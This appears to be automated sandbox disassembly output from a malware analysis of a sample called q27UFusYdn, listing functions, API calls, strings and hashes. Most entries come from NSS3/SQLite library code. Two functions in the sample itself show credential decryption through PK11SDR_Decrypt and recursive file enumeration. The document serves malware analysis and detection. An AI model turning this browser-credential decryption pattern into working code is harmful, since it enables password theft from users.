Part of subcall function 6CE252D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CE7F1E9,?,00000000,?,?), ref: 6CE252F5
Part of subcall function 6CE252D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CE2530F
Part of subcall function 6CE252D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CE25326
Part of subcall function 6CE252D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CE7F1E9,?,00000000,?,?), ref: 6CE25340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE7F227

Part of subcall function 6CE6FAB0: free.MOZGLUE(?,-00000001,?,?,6CE0F673,00000000,00000000), ref: 6CE6FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CE7F23E

Part of subcall function 6CE6BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CE1E708,00000000,00000000,00000004,00000000), ref: 6CE6BE6A
Part of subcall function 6CE6BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE204DC,?), ref: 6CE6BE7E
Part of subcall function 6CE6BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CE6BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CE7F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CE7F3A8

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CE7F3B3

Part of subcall function 6CE22D20: PK11_DestroyObject.NSS3(?,?), ref: 6CE22D3C
Part of subcall function 6CE22D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CE22D5F

Strings

5s/, xrefs: 6CE7EFFE

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID: 5s/
API String ID: 1559028977-340167759
Opcode ID: b885c75a6415366a257705fc2c3c6543390511a8bd86100f5147b074e90e473f
Instruction ID: ebb5925f3ad3d8fd793909a8566ad8b5cd148a72341bd133f6c392c44786cf5c
Opcode Fuzzy Hash: b885c75a6415366a257705fc2c3c6543390511a8bd86100f5147b074e90e473f
Instruction Fuzzy Hash: 32D152B6E016059FDB24CFA9D880A9EB7F5FF4830CF258129D915A7B11E735E806CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE0EF40 Relevance: 25.1, APIs: 10, Strings: 4, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE0EF63

Part of subcall function 6CE187D0: PORT_NewArena_Util.NSS3(00000800,6CE0EF74,00000000), ref: 6CE187E8
Part of subcall function 6CE187D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6CE0EF74,00000000), ref: 6CE187FD
Part of subcall function 6CE187D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE1884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6CE0F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE0F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6CE0F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6CE0F374
PL_strcasecmp.NSS3(6CF52FD4,?), ref: 6CE0F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6CE0F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CE0F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CE0F67D
CERT_DestroyName.NSS3(?), ref: 6CE0F68B

Part of subcall function 6CE18320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6CE18338
Part of subcall function 6CE18320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CE18364
Part of subcall function 6CE18320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6CE1838E
Part of subcall function 6CE18320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE183A5
Part of subcall function 6CE18320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE183E3

Part of subcall function 6CE184C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6CE184D9
Part of subcall function 6CE184C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE18528

Part of subcall function 6CE18900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6CE0F599,?,00000000), ref: 6CE18955

Strings

*, xrefs: 6CE0F3C6
5s/, xrefs: 6CE0EF52
oid., xrefs: 6CE0F2CF
", xrefs: 6CE0F21B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.$5s/
API String ID: 4161946812-92230900
Opcode ID: 5b77c10c148164ad2ee003a562aa63b477b3f556391864d93eef094002554968
Instruction ID: 89c1bb2570f2855d00b4d1ad874d2ce71a40b23e261f2a8fa2601cd09e561093
Opcode Fuzzy Hash: 5b77c10c148164ad2ee003a562aa63b477b3f556391864d93eef094002554968
Instruction Fuzzy Hash: 57222671B083518BD710CE68D49036AB7F6AB8531CF38462EE49587B91E7399C3687CB

Uniqueness

Uniqueness Score: -1.00%

Function 6CD9ECC0 Relevance: 21.7, APIs: 8, Strings: 4, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD9ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD9EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CD9EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CD9EF98

Strings

%s at line %d of [%.10s], xrefs: 6CD9F492
5s/, xrefs: 6CD9ECCE
database corruption, xrefs: 6CD9F48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CD9F483

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption$5s/
API String ID: 4101233201-852466114
Opcode ID: 052e1b40b9bd7013662fedb7300da6fcd825d3d8edcfe6b6107398e321bae220
Instruction ID: 85643981f142111c217a0f98e2c9f8051a9be3eedb235f7dabb30a6f0f4e6d50
Opcode Fuzzy Hash: 052e1b40b9bd7013662fedb7300da6fcd825d3d8edcfe6b6107398e321bae220
Instruction Fuzzy Hash: BF620379A04245CFDB04CF64C4847AABBF1BF45318F28419DE8456BBB2D735E886CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE66C00 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE11C6F,00000000,00000004,?,?), ref: 6CE66C3F

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CE11C6F,00000000,00000004,?,?), ref: 6CE66C60
PR_ExplodeTime.NSS3(00000000,6CE11C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CE11C6F,00000000,00000004,?,?), ref: 6CE66C94

Strings

gfff, xrefs: 6CE66D30
gfff, xrefs: 6CE66CF5
5s/, xrefs: 6CE66C0F
gfff, xrefs: 6CE66D66
gfff, xrefs: 6CE66D9C
gfff, xrefs: 6CE66CFD

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff$5s/
API String ID: 3534712800-127157603
Opcode ID: 8e1f59e1c67f25e955c91cbede47731bc3d6e58c9910517aebe3c982b8e51b1c
Instruction ID: d3a9efea7c99f323977cc656be116d192a1424693470557b4758d732b3a1abd3
Opcode Fuzzy Hash: 8e1f59e1c67f25e955c91cbede47731bc3d6e58c9910517aebe3c982b8e51b1c
Instruction Fuzzy Hash: 80515A72B116494FC708CDADDC527DABBEAABA4310F48C23AE442DBB81D638D906C751

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE0F20 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6CEE1027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CEE10B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CEE1353

Strings

zeroblob(%d), xrefs: 6CEE1223
-- , xrefs: 6CEE0FF5
%02x, xrefs: 6CEE12F6
'%.*q', xrefs: 6CEE1217, 6CEE1292
5s/, xrefs: 6CEE0F2F
NULL, xrefs: 6CEE119E
%lld, xrefs: 6CEE114B
$, xrefs: 6CEE12A0

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)$5s/
API String ID: 2619041689-1813674841
Opcode ID: 82ae85e3844fb108686fa3939b4ab23016027097daeb2162face02fdc9778afb
Instruction ID: 087b4a1a4094f5c8d03883cbb2767ba5e734fb4eba1a4bb042e2b0e5c2d466a2
Opcode Fuzzy Hash: 82ae85e3844fb108686fa3939b4ab23016027097daeb2162face02fdc9778afb
Instruction Fuzzy Hash: EBE1A171A083409FD704CF94C480A6BBBF1BF8A388F65891DE59587752D771E885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CE40EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CE40F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CE40FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CE41006
PK11_FreeSymKey.NSS3(?), ref: 6CE4101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE41033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE4103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CE41048
memcpy.VCRUNTIME140(?,?,?), ref: 6CE4108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CE410BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CE410D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CE4112E

Part of subcall function 6CE41570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CE408C4,?,?), ref: 6CE415B8
Part of subcall function 6CE41570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CE408C4,?,?), ref: 6CE415C1
Part of subcall function 6CE41570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE4162E
Part of subcall function 6CE41570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE41637

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 8d2cc4a321ca385e2413287d46e46137603fad2b75b93b4a3711007027d1822b
Instruction ID: e519b29c3784c8bf582ab9657198ea104f20924ad1c24025c0b91a2b4d1cbe87
Opcode Fuzzy Hash: 8d2cc4a321ca385e2413287d46e46137603fad2b75b93b4a3711007027d1822b
Instruction Fuzzy Hash: 7471EFB1A00205CFDB04CFA5ED81A6AB7B1FF4831CF24862DE91997B11E731E965CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF90 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BFC3
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,04143290), ref: 0040BFE1
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
memcpy.MSVCRT ref: 0040C082
lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
PK11_FreeSlot.NSS3(?), ref: 0040C0D1
lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D540 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
FindClose.KERNEL32(000000FF), ref: 0040DB1C

Strings

[@, xrefs: 0040D562, 0040DB2A, 0040D623, 0040D5A5, 0040D626
\*.*, xrefs: 0040D556

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: [@$\*.*
API String ID: 2325840235-1445036518
Opcode ID: 38e3d6cce44b768a46b52d0f201da3e53e41ef1bf9bb4bc0dfdcbbefdde4abe9
Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
Opcode Fuzzy Hash: 38e3d6cce44b768a46b52d0f201da3e53e41ef1bf9bb4bc0dfdcbbefdde4abe9
Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE8FB0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CEE8FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEE90DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEE9118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEE915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEE91C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEE9209

Strings

3333, xrefs: 6CEE925E
UUUU, xrefs: 6CEE9255
5s/, xrefs: 6CEE8FBE

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU$5s/
API String ID: 1967222509-1008882137
Opcode ID: 6cdff4f8b2ace81eceea980392bff055762160b7151f522fa9fe7a68a654e065
Instruction ID: ab987aac6b91c0344500c2d3e7ad751afcb4f1329bfbf13751cc3b475c8005c6
Opcode Fuzzy Hash: 6cdff4f8b2ace81eceea980392bff055762160b7151f522fa9fe7a68a654e065
Instruction Fuzzy Hash: 9DA1AF72E001259BDB04CB69CC81BEEB7F5BF4C368F1A4129E915A7351E736AC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA0FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6CD9CA30: EnterCriticalSection.KERNEL32(?,?,?,6CDFF9C9,?,6CDFF4DA,6CDFF9C9,?,?,6CDC369A), ref: 6CD9CA7A
Part of subcall function 6CD9CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CD9CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CDA103E
EnterCriticalSection.KERNEL32(?), ref: 6CDA1139
LeaveCriticalSection.KERNEL32(?), ref: 6CDA1190
sqlite3_free.NSS3(00000000), ref: 6CDA1227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CDA126E
sqlite3_free.NSS3(?), ref: 6CDA127F

Strings

winAccess, xrefs: 6CDA129B
5s/, xrefs: 6CDA0FEC
delayed %dms for lock/sharing conflict at line %d, xrefs: 6CDA1267

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess$5s/
API String ID: 2733752649-2385740458
Opcode ID: b98a5f246aab1bd2ff3d8c91fee219430c195152fd6b16752329568b4e435875
Instruction ID: 327fe143f945ba7d165267dbd2b2f4008f767e0fb42b97cd6d312196575cd4b5
Opcode Fuzzy Hash: b98a5f246aab1bd2ff3d8c91fee219430c195152fd6b16752329568b4e435875
Instruction Fuzzy Hash: 39713D36F05211DFEB449FA5EC49B6B3775FF86314F144229E82587AA0DB30D806CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CECA480 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CEEC3A2,?,?,00000000,00000000), ref: 6CECA528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CECA6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CECA71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CECA738

Strings

%s at line %d of [%.10s], xrefs: 6CECA6D9
5s/, xrefs: 6CECA490
database corruption, xrefs: 6CECA6D4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CECA6CA

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption$5s/
API String ID: 622669576-852466114
Opcode ID: fd6677dfeefe22fe01ecdeb63f3680add6d68448e208b9d1ea24e0f066612536
Instruction ID: e9156fca5bb8c87340854bd7c37f8e2889259e0d18e613a141eb2cde8997358f
Opcode Fuzzy Hash: fd6677dfeefe22fe01ecdeb63f3680add6d68448e208b9d1ea24e0f066612536
Instruction Fuzzy Hash: 0291D131B883418BC714CF28C58065AB7F1BF49318F658A6DE8A58BB91EB34EC45C783

Uniqueness

Uniqueness Score: -1.00%

Function 6CDAAEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CECCF46,?,6CD9CDBD,?,6CECBF31,?,?,?,?,?,?,?), ref: 6CDAB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CECCF46,?,6CD9CDBD,?,6CECBF31), ref: 6CDAB090
sqlite3_free.NSS3(?,?,?,?,?,?,6CECCF46,?,6CD9CDBD,?,6CECBF31), ref: 6CDAB0A2
CloseHandle.KERNEL32(?,?,6CECCF46,?,6CD9CDBD,?,6CECBF31,?,?,?,?,?,?,?,?,?), ref: 6CDAB100
